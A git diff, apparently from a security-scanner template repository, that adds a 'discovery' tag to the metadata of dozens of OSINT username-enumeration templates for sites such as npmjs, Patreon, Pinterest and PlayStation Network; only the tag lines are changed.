@@ info: metadata: verified: true max-request: 1 - tags: osint,osint-social,owasp,nest + tags: osint,osint-social,owasp,nest,discovery self-contained: true diff --git a/http/osint/user-enumeration/netvibes.yaml b/http/osint/user-enumeration/netvibes.yaml index 71e81e0b370..8eda97d1138 100644 --- a/http/osint/user-enumeration/netvibes.yaml +++ b/http/osint/user-enumeration/netvibes.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,netvibes + tags: osint,osint-social,netvibes,discovery self-contained: true diff --git a/http/osint/user-enumeration/newgrounds.yaml b/http/osint/user-enumeration/newgrounds.yaml index b6c2965c256..07f3ee7916c 100644 --- a/http/osint/user-enumeration/newgrounds.yaml +++ b/http/osint/user-enumeration/newgrounds.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,newgrounds + tags: osint,osint-gaming,newgrounds,discovery self-contained: true diff --git a/http/osint/user-enumeration/newmeet.yaml b/http/osint/user-enumeration/newmeet.yaml index ffabb348d16..40500236cd9 100644 --- a/http/osint/user-enumeration/newmeet.yaml +++ b/http/osint/user-enumeration/newmeet.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-dating,newmeet + tags: osint,osint-dating,newmeet,discovery self-contained: true diff --git a/http/osint/user-enumeration/nihbuatjajan.yaml b/http/osint/user-enumeration/nihbuatjajan.yaml index bd5721000ff..1eb49a306c8 100644 --- a/http/osint/user-enumeration/nihbuatjajan.yaml +++ b/http/osint/user-enumeration/nihbuatjajan.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,nihbuatjajan + tags: osint,osint-social,nihbuatjajan,discovery self-contained: true diff --git a/http/osint/user-enumeration/nitecrew-mastodon-instance.yaml b/http/osint/user-enumeration/nitecrew-mastodon-instance.yaml index 1a7ad6c5e7d..de3f5db9181 100644 --- a/http/osint/user-enumeration/nitecrew-mastodon-instance.yaml +++ b/http/osint/user-enumeration/nitecrew-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,nitecrew-mastodon-instance + tags: osint,osint-social,nitecrew-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/nnru.yaml b/http/osint/user-enumeration/nnru.yaml index 5993d7c6cbc..3f0e6ac3637 100644 --- a/http/osint/user-enumeration/nnru.yaml +++ b/http/osint/user-enumeration/nnru.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,nnru + tags: osint,osint-social,nnru,discovery self-contained: true diff --git a/http/osint/user-enumeration/notabug.yaml b/http/osint/user-enumeration/notabug.yaml index dff3ad9ea9f..6a7ed9581c5 100644 --- a/http/osint/user-enumeration/notabug.yaml +++ b/http/osint/user-enumeration/notabug.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,notabug + tags: osint,osint-coding,notabug,discovery self-contained: true diff --git a/http/osint/user-enumeration/note.yaml b/http/osint/user-enumeration/note.yaml index ee50c7d9307..baedb6595c6 100644 --- a/http/osint/user-enumeration/note.yaml +++ b/http/osint/user-enumeration/note.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,note + tags: osint,osint-social,note,discovery self-contained: true diff --git a/http/osint/user-enumeration/npmjs.yaml b/http/osint/user-enumeration/npmjs.yaml index 603b35b083a..78742c8c989 100644 --- a/http/osint/user-enumeration/npmjs.yaml +++ b/http/osint/user-enumeration/npmjs.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,npmjs + tags: osint,osint-social,npmjs,discovery self-contained: true diff --git a/http/osint/user-enumeration/oglaszamy24hpl.yaml b/http/osint/user-enumeration/oglaszamy24hpl.yaml index b1c446d11a2..916b5e30582 100644 --- a/http/osint/user-enumeration/oglaszamy24hpl.yaml +++ b/http/osint/user-enumeration/oglaszamy24hpl.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-shopping,oglaszamy24hpl + tags: osint,osint-shopping,oglaszamy24hpl,discovery self-contained: true diff --git a/http/osint/user-enumeration/ogugg.yaml b/http/osint/user-enumeration/ogugg.yaml index a6b4dc38968..6d3758000cc 100644 --- a/http/osint/user-enumeration/ogugg.yaml +++ b/http/osint/user-enumeration/ogugg.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,ogugg + tags: osint,osint-social,ogugg,discovery self-contained: true diff --git a/http/osint/user-enumeration/okidoki.yaml b/http/osint/user-enumeration/okidoki.yaml index c855630a3d4..e0d17b8f138 100644 --- a/http/osint/user-enumeration/okidoki.yaml +++ b/http/osint/user-enumeration/okidoki.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,okidoki + tags: osint,osint-misc,okidoki,discovery self-contained: true diff --git a/http/osint/user-enumeration/okru.yaml b/http/osint/user-enumeration/okru.yaml index 62a0a145000..e12a4185da3 100644 --- a/http/osint/user-enumeration/okru.yaml +++ b/http/osint/user-enumeration/okru.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,okru + tags: osint,osint-social,okru,discovery self-contained: true diff --git a/http/osint/user-enumeration/olx.yaml b/http/osint/user-enumeration/olx.yaml index 88d57c1a75e..3a326759bc2 100644 --- a/http/osint/user-enumeration/olx.yaml +++ b/http/osint/user-enumeration/olx.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-shopping,olx + tags: osint,osint-shopping,olx,discovery self-contained: true diff --git a/http/osint/user-enumeration/omlet.yaml b/http/osint/user-enumeration/omlet.yaml index 837a4b69c09..80daf8bfbc7 100644 --- a/http/osint/user-enumeration/omlet.yaml +++ b/http/osint/user-enumeration/omlet.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,omlet + tags: osint,osint-gaming,omlet,discovery self-contained: true diff --git a/http/osint/user-enumeration/opencollective.yaml b/http/osint/user-enumeration/opencollective.yaml index 4a407a05ea3..cf452fe615c 100644 --- a/http/osint/user-enumeration/opencollective.yaml +++ b/http/osint/user-enumeration/opencollective.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-finance,opencollective + tags: osint,osint-finance,opencollective,discovery self-contained: true diff --git a/http/osint/user-enumeration/opensource.yaml b/http/osint/user-enumeration/opensource.yaml index 3877f36bcc5..9e27b3a3b0a 100644 --- a/http/osint/user-enumeration/opensource.yaml +++ b/http/osint/user-enumeration/opensource.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,opensource + tags: osint,osint-tech,opensource,discovery self-contained: true diff --git a/http/osint/user-enumeration/openstreetmap.yaml b/http/osint/user-enumeration/openstreetmap.yaml index d880eef2e4c..2f84ef6a5af 100644 --- a/http/osint/user-enumeration/openstreetmap.yaml +++ b/http/osint/user-enumeration/openstreetmap.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,openstreetmap + tags: osint,osint-social,openstreetmap,discovery self-contained: true diff --git a/http/osint/user-enumeration/opgg.yaml b/http/osint/user-enumeration/opgg.yaml index c8ccd87d2bc..ff5b422f302 100644 --- a/http/osint/user-enumeration/opgg.yaml +++ b/http/osint/user-enumeration/opgg.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,opgg + tags: osint,osint-gaming,opgg,discovery self-contained: true diff --git a/http/osint/user-enumeration/orbys.yaml b/http/osint/user-enumeration/orbys.yaml index 3ce4c3e484e..7a1f6e53e2d 100644 --- a/http/osint/user-enumeration/orbys.yaml +++ b/http/osint/user-enumeration/orbys.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,orbys + tags: osint,osint-social,orbys,discovery self-contained: true diff --git a/http/osint/user-enumeration/osu.yaml b/http/osint/user-enumeration/osu.yaml index 3fc4d6a5402..dc5e5a928f7 100644 --- a/http/osint/user-enumeration/osu.yaml +++ b/http/osint/user-enumeration/osu.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,osu + tags: osint,osint-gaming,osu,discovery self-contained: true diff --git a/http/osint/user-enumeration/our-freedom-book.yaml b/http/osint/user-enumeration/our-freedom-book.yaml index 3175a2a712d..a6e56c172d8 100644 --- a/http/osint/user-enumeration/our-freedom-book.yaml +++ b/http/osint/user-enumeration/our-freedom-book.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,our-freedom-book + tags: osint,osint-social,our-freedom-book,discovery self-contained: true diff --git a/http/osint/user-enumeration/owly.yaml b/http/osint/user-enumeration/owly.yaml index 87ced36602b..12e3ab37100 100644 --- a/http/osint/user-enumeration/owly.yaml +++ b/http/osint/user-enumeration/owly.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,owly + tags: osint,osint-social,owly,discovery self-contained: true diff --git a/http/osint/user-enumeration/palnet.yaml b/http/osint/user-enumeration/palnet.yaml index 38207f05adb..59c9b25cbd7 100644 --- a/http/osint/user-enumeration/palnet.yaml +++ b/http/osint/user-enumeration/palnet.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-finance,palnet + tags: osint,osint-finance,palnet,discovery self-contained: true diff --git a/http/osint/user-enumeration/parler-archived-posts.yaml b/http/osint/user-enumeration/parler-archived-posts.yaml index 91f2c44c159..c6cfc6a7d05 100644 --- a/http/osint/user-enumeration/parler-archived-posts.yaml +++ b/http/osint/user-enumeration/parler-archived-posts.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-archived,parler-archived-posts + tags: osint,osint-archived,parler-archived-posts,discovery self-contained: true diff --git a/http/osint/user-enumeration/parler-archived-profile.yaml b/http/osint/user-enumeration/parler-archived-profile.yaml index 1009fb17a43..136e4b4e345 100644 --- a/http/osint/user-enumeration/parler-archived-profile.yaml +++ b/http/osint/user-enumeration/parler-archived-profile.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-archived,parler-archived-profile + tags: osint,osint-archived,parler-archived-profile,discovery self-contained: true diff --git a/http/osint/user-enumeration/parler.yaml b/http/osint/user-enumeration/parler.yaml index 998b0b39863..f665483c595 100644 --- a/http/osint/user-enumeration/parler.yaml +++ b/http/osint/user-enumeration/parler.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,parler + tags: osint,osint-social,parler,discovery self-contained: true diff --git a/http/osint/user-enumeration/pastebin.yaml b/http/osint/user-enumeration/pastebin.yaml index e8516a22489..c78ce8c0b5c 100644 --- a/http/osint/user-enumeration/pastebin.yaml +++ b/http/osint/user-enumeration/pastebin.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,pastebin + tags: osint,osint-tech,pastebin,discovery self-contained: true diff --git a/http/osint/user-enumeration/patch.yaml b/http/osint/user-enumeration/patch.yaml index 8a29d248f53..1286632ab52 100644 --- a/http/osint/user-enumeration/patch.yaml +++ b/http/osint/user-enumeration/patch.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-news,patch + tags: osint,osint-news,patch,discovery self-contained: true diff --git a/http/osint/user-enumeration/patientslikeme.yaml b/http/osint/user-enumeration/patientslikeme.yaml index 6442e7aaa21..07b14ffb7eb 100644 --- a/http/osint/user-enumeration/patientslikeme.yaml +++ b/http/osint/user-enumeration/patientslikeme.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-health,patientslikeme + tags: osint,osint-health,patientslikeme,discovery self-contained: true diff --git a/http/osint/user-enumeration/patreon.yaml b/http/osint/user-enumeration/patreon.yaml index 780ea4b5cb1..ddc13fd7e2c 100644 --- a/http/osint/user-enumeration/patreon.yaml +++ b/http/osint/user-enumeration/patreon.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-finance,patreon + tags: osint,osint-finance,patreon,discovery self-contained: true diff --git a/http/osint/user-enumeration/patriots-win.yaml b/http/osint/user-enumeration/patriots-win.yaml index b7b9751f730..f9e42fcab70 100644 --- a/http/osint/user-enumeration/patriots-win.yaml +++ b/http/osint/user-enumeration/patriots-win.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-political,patriots-win + tags: osint,osint-political,patriots-win,discovery self-contained: true diff --git a/http/osint/user-enumeration/patronite.yaml b/http/osint/user-enumeration/patronite.yaml index 74c5db5afe5..9edc351b27a 100644 --- a/http/osint/user-enumeration/patronite.yaml +++ b/http/osint/user-enumeration/patronite.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-finance,patronite + tags: osint,osint-finance,patronite,discovery self-contained: true diff --git a/http/osint/user-enumeration/paypal.yaml b/http/osint/user-enumeration/paypal.yaml index bf7d59eed18..796d46cb9c8 100644 --- a/http/osint/user-enumeration/paypal.yaml +++ b/http/osint/user-enumeration/paypal.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-finance,paypal + tags: osint,osint-finance,paypal,discovery self-contained: true diff --git a/http/osint/user-enumeration/pcgamer.yaml b/http/osint/user-enumeration/pcgamer.yaml index b944ba9f4a1..163430d18b5 100644 --- a/http/osint/user-enumeration/pcgamer.yaml +++ b/http/osint/user-enumeration/pcgamer.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,pcgamer + tags: osint,osint-gaming,pcgamer,discovery self-contained: true diff --git a/http/osint/user-enumeration/pcpartpicker.yaml b/http/osint/user-enumeration/pcpartpicker.yaml index e7798790375..2ca15a600ee 100644 --- a/http/osint/user-enumeration/pcpartpicker.yaml +++ b/http/osint/user-enumeration/pcpartpicker.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,pcpartpicker + tags: osint,osint-tech,pcpartpicker,discovery self-contained: true diff --git a/http/osint/user-enumeration/peing.yaml b/http/osint/user-enumeration/peing.yaml index dc00420c1e3..6ab6752df97 100644 --- a/http/osint/user-enumeration/peing.yaml +++ b/http/osint/user-enumeration/peing.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,peing + tags: osint,osint-social,peing,discovery self-contained: true diff --git a/http/osint/user-enumeration/periscope.yaml b/http/osint/user-enumeration/periscope.yaml index 5c0855bdb71..e00f4028660 100644 --- a/http/osint/user-enumeration/periscope.yaml +++ b/http/osint/user-enumeration/periscope.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-video,periscope + tags: osint,osint-video,periscope,discovery self-contained: true diff --git a/http/osint/user-enumeration/pettingzooco-mastodon-instance.yaml b/http/osint/user-enumeration/pettingzooco-mastodon-instance.yaml index 349bd50649b..fbb2cbc1cb7 100644 --- a/http/osint/user-enumeration/pettingzooco-mastodon-instance.yaml +++ b/http/osint/user-enumeration/pettingzooco-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,pettingzooco-mastodon-instance + tags: osint,osint-social,pettingzooco-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/pewex.yaml b/http/osint/user-enumeration/pewex.yaml index 8c8e4808d18..a0fa020ae64 100644 --- a/http/osint/user-enumeration/pewex.yaml +++ b/http/osint/user-enumeration/pewex.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,pewex + tags: osint,osint-misc,pewex,discovery self-contained: true diff --git a/http/osint/user-enumeration/picsart.yaml b/http/osint/user-enumeration/picsart.yaml index 023e6fe1aa6..03baf72c483 100644 --- a/http/osint/user-enumeration/picsart.yaml +++ b/http/osint/user-enumeration/picsart.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-art,picsart + tags: osint,osint-art,picsart,discovery self-contained: true diff --git a/http/osint/user-enumeration/piekielni.yaml b/http/osint/user-enumeration/piekielni.yaml index 91d0ac04231..7ad72d1329c 100644 --- a/http/osint/user-enumeration/piekielni.yaml +++ b/http/osint/user-enumeration/piekielni.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,piekielni + tags: osint,osint-misc,piekielni,discovery self-contained: true diff --git a/http/osint/user-enumeration/pikabu.yaml b/http/osint/user-enumeration/pikabu.yaml index c9c197a7515..9cab917bd63 100644 --- a/http/osint/user-enumeration/pikabu.yaml +++ b/http/osint/user-enumeration/pikabu.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,pikabu + tags: osint,osint-social,pikabu,discovery self-contained: true diff --git a/http/osint/user-enumeration/pillowfort.yaml b/http/osint/user-enumeration/pillowfort.yaml index 36b80f781f5..8685071d7ad 100644 --- a/http/osint/user-enumeration/pillowfort.yaml +++ b/http/osint/user-enumeration/pillowfort.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,pillowfort + tags: osint,osint-social,pillowfort,discovery self-contained: true diff --git a/http/osint/user-enumeration/pinkbike.yaml b/http/osint/user-enumeration/pinkbike.yaml index 2328cd90ba0..a058a7d3039 100644 --- a/http/osint/user-enumeration/pinkbike.yaml +++ b/http/osint/user-enumeration/pinkbike.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,pinkbike + tags: osint,osint-hobby,pinkbike,discovery self-contained: true diff --git a/http/osint/user-enumeration/pinterest.yaml b/http/osint/user-enumeration/pinterest.yaml index a8f5d79b241..3e7cadaadca 100644 --- a/http/osint/user-enumeration/pinterest.yaml +++ b/http/osint/user-enumeration/pinterest.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,pinterest + tags: osint,osint-social,pinterest,discovery self-contained: true diff --git a/http/osint/user-enumeration/piratebay.yaml b/http/osint/user-enumeration/piratebay.yaml index 41c74653cb6..dce86decb9c 100644 --- a/http/osint/user-enumeration/piratebay.yaml +++ b/http/osint/user-enumeration/piratebay.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: osint,osint-p2p,piratebay,headless + tags: osint,osint-p2p,piratebay,headless,discovery self-contained: true diff --git a/http/osint/user-enumeration/pixelfedsocial.yaml b/http/osint/user-enumeration/pixelfedsocial.yaml index 3ca7eb06c81..b6f3189d989 100644 --- a/http/osint/user-enumeration/pixelfedsocial.yaml +++ b/http/osint/user-enumeration/pixelfedsocial.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,pixelfedsocial + tags: osint,osint-social,pixelfedsocial,discovery self-contained: true diff --git a/http/osint/user-enumeration/platzi.yaml b/http/osint/user-enumeration/platzi.yaml index cfd906fb049..f20eea025b0 100644 --- a/http/osint/user-enumeration/platzi.yaml +++ b/http/osint/user-enumeration/platzi.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,platzi + tags: osint,osint-social,platzi,discovery self-contained: true diff --git a/http/osint/user-enumeration/playstation-network.yaml b/http/osint/user-enumeration/playstation-network.yaml index 17143cc5c09..3202809b3ae 100644 --- a/http/osint/user-enumeration/playstation-network.yaml +++ b/http/osint/user-enumeration/playstation-network.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,playstation-network + tags: osint,osint-gaming,playstation-network,discovery self-contained: true diff --git a/http/osint/user-enumeration/plurk.yaml b/http/osint/user-enumeration/plurk.yaml index 7ab78b00cdc..d994e3e6ce0 100644 --- a/http/osint/user-enumeration/plurk.yaml +++ b/http/osint/user-enumeration/plurk.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,plurk + tags: osint,osint-social,plurk,discovery self-contained: true diff --git a/http/osint/user-enumeration/pokec.yaml b/http/osint/user-enumeration/pokec.yaml index d4565fba8ce..80752fd487e 100644 --- a/http/osint/user-enumeration/pokec.yaml +++ b/http/osint/user-enumeration/pokec.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,pokec + tags: osint,osint-social,pokec,discovery self-contained: true diff --git a/http/osint/user-enumeration/pokemonshowdown.yaml b/http/osint/user-enumeration/pokemonshowdown.yaml index c467338b7fe..4376ec91e5b 100644 --- a/http/osint/user-enumeration/pokemonshowdown.yaml +++ b/http/osint/user-enumeration/pokemonshowdown.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,pokemonshowdown + tags: osint,osint-gaming,pokemonshowdown,discovery self-contained: true diff --git a/http/osint/user-enumeration/pokerstrategy.yaml b/http/osint/user-enumeration/pokerstrategy.yaml index 69227d9a384..332a54bab7e 100644 --- a/http/osint/user-enumeration/pokerstrategy.yaml +++ b/http/osint/user-enumeration/pokerstrategy.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,pokerstrategy + tags: osint,osint-gaming,pokerstrategy,discovery self-contained: true diff --git a/http/osint/user-enumeration/polchatpl.yaml b/http/osint/user-enumeration/polchatpl.yaml index 6b2f9552927..1d851ad5aa6 100644 --- a/http/osint/user-enumeration/polchatpl.yaml +++ b/http/osint/user-enumeration/polchatpl.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,polchatpl + tags: osint,osint-social,polchatpl,discovery self-contained: true diff --git a/http/osint/user-enumeration/policja2009.yaml b/http/osint/user-enumeration/policja2009.yaml index 63f0d5a9dad..f8491ab9ace 100644 --- a/http/osint/user-enumeration/policja2009.yaml +++ b/http/osint/user-enumeration/policja2009.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,policja2009 + tags: osint,osint-misc,policja2009,discovery self-contained: true diff --git a/http/osint/user-enumeration/poll-everywhere.yaml b/http/osint/user-enumeration/poll-everywhere.yaml index 47e4dd77f28..0247a766f12 100644 --- a/http/osint/user-enumeration/poll-everywhere.yaml +++ b/http/osint/user-enumeration/poll-everywhere.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,poll-everywhere + tags: osint,osint-tech,poll-everywhere,discovery self-contained: true diff --git a/http/osint/user-enumeration/polygon.yaml b/http/osint/user-enumeration/polygon.yaml index f350228f77c..18d1df25aba 100644 --- a/http/osint/user-enumeration/polygon.yaml +++ b/http/osint/user-enumeration/polygon.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,polygon + tags: osint,osint-gaming,polygon,discovery self-contained: true diff --git a/http/osint/user-enumeration/polywork.yaml b/http/osint/user-enumeration/polywork.yaml index 994461eb6eb..860906a8210 100644 --- a/http/osint/user-enumeration/polywork.yaml +++ b/http/osint/user-enumeration/polywork.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,polywork + tags: osint,osint-social,polywork,discovery self-contained: true diff --git a/http/osint/user-enumeration/popl.yaml b/http/osint/user-enumeration/popl.yaml index 3e6ce17c9d0..6468f24eb78 100644 --- a/http/osint/user-enumeration/popl.yaml +++ b/http/osint/user-enumeration/popl.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-business,popl + tags: osint,osint-business,popl,discovery self-contained: true diff --git a/http/osint/user-enumeration/pornhub-porn-stars.yaml b/http/osint/user-enumeration/pornhub-porn-stars.yaml index 6aa8b397381..d185e028a64 100644 --- a/http/osint/user-enumeration/pornhub-porn-stars.yaml +++ b/http/osint/user-enumeration/pornhub-porn-stars.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,pornhub-porn-stars + tags: osint,osint-porn,pornhub-porn-stars,discovery self-contained: true diff --git a/http/osint/user-enumeration/pornhub-users.yaml b/http/osint/user-enumeration/pornhub-users.yaml index 83af3926c7a..05a30907181 100644 --- a/http/osint/user-enumeration/pornhub-users.yaml +++ b/http/osint/user-enumeration/pornhub-users.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,pornhub-users + tags: osint,osint-porn,pornhub-users,discovery self-contained: true diff --git a/http/osint/user-enumeration/poshmark.yaml b/http/osint/user-enumeration/poshmark.yaml index 43481215e2a..b47fcb742d4 100644 --- a/http/osint/user-enumeration/poshmark.yaml +++ b/http/osint/user-enumeration/poshmark.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-shopping,poshmark + tags: osint,osint-shopping,poshmark,discovery self-contained: true diff --git a/http/osint/user-enumeration/postcrossing.yaml b/http/osint/user-enumeration/postcrossing.yaml index f6bdaf6d520..befb522ab65 100644 --- a/http/osint/user-enumeration/postcrossing.yaml +++ b/http/osint/user-enumeration/postcrossing.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,postcrossing + tags: osint,osint-social,postcrossing,discovery self-contained: true diff --git a/http/osint/user-enumeration/postnews.yaml b/http/osint/user-enumeration/postnews.yaml index 4abe61b0739..021329ef9cc 100644 --- a/http/osint/user-enumeration/postnews.yaml +++ b/http/osint/user-enumeration/postnews.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,postnews + tags: osint,osint-social,postnews,discovery self-contained: true diff --git a/http/osint/user-enumeration/poweredbygaysocial-mastodon-instance.yaml b/http/osint/user-enumeration/poweredbygaysocial-mastodon-instance.yaml index 226bff0b42e..46cbd0a2d4c 100644 --- a/http/osint/user-enumeration/poweredbygaysocial-mastodon-instance.yaml +++ b/http/osint/user-enumeration/poweredbygaysocial-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,poweredbygaysocial-mastodon-instance + tags: osint,osint-social,poweredbygaysocial-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/producthunt.yaml b/http/osint/user-enumeration/producthunt.yaml index 904fecacc8d..4a3c9defa55 100644 --- a/http/osint/user-enumeration/producthunt.yaml +++ b/http/osint/user-enumeration/producthunt.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-business,producthunt + tags: osint,osint-business,producthunt,discovery self-contained: true diff --git a/http/osint/user-enumeration/promodj.yaml b/http/osint/user-enumeration/promodj.yaml index af290300838..e0c4fc6f317 100644 --- a/http/osint/user-enumeration/promodj.yaml +++ b/http/osint/user-enumeration/promodj.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-music,promodj + tags: osint,osint-music,promodj,discovery self-contained: true diff --git a/http/osint/user-enumeration/pronounspage.yaml b/http/osint/user-enumeration/pronounspage.yaml index d80fd3148bd..26a158e433b 100644 --- a/http/osint/user-enumeration/pronounspage.yaml +++ b/http/osint/user-enumeration/pronounspage.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,pronounspage + tags: osint,osint-social,pronounspage,discovery self-contained: true diff --git a/http/osint/user-enumeration/pronouny.yaml b/http/osint/user-enumeration/pronouny.yaml index f198b5dcc0d..187917436dd 100644 --- a/http/osint/user-enumeration/pronouny.yaml +++ b/http/osint/user-enumeration/pronouny.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,pronouny + tags: osint,osint-social,pronouny,discovery self-contained: true diff --git a/http/osint/user-enumeration/prose.yaml b/http/osint/user-enumeration/prose.yaml index 1713de6a1ef..4b5db314b2d 100644 --- a/http/osint/user-enumeration/prose.yaml +++ b/http/osint/user-enumeration/prose.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-blog,prose + tags: osint,osint-blog,prose,discovery self-contained: true diff --git a/http/osint/user-enumeration/prvpl.yaml b/http/osint/user-enumeration/prvpl.yaml index 97a93c17840..5ec8546e239 100644 --- a/http/osint/user-enumeration/prvpl.yaml +++ b/http/osint/user-enumeration/prvpl.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,prvpl + tags: osint,osint-tech,prvpl,discovery self-contained: true diff --git 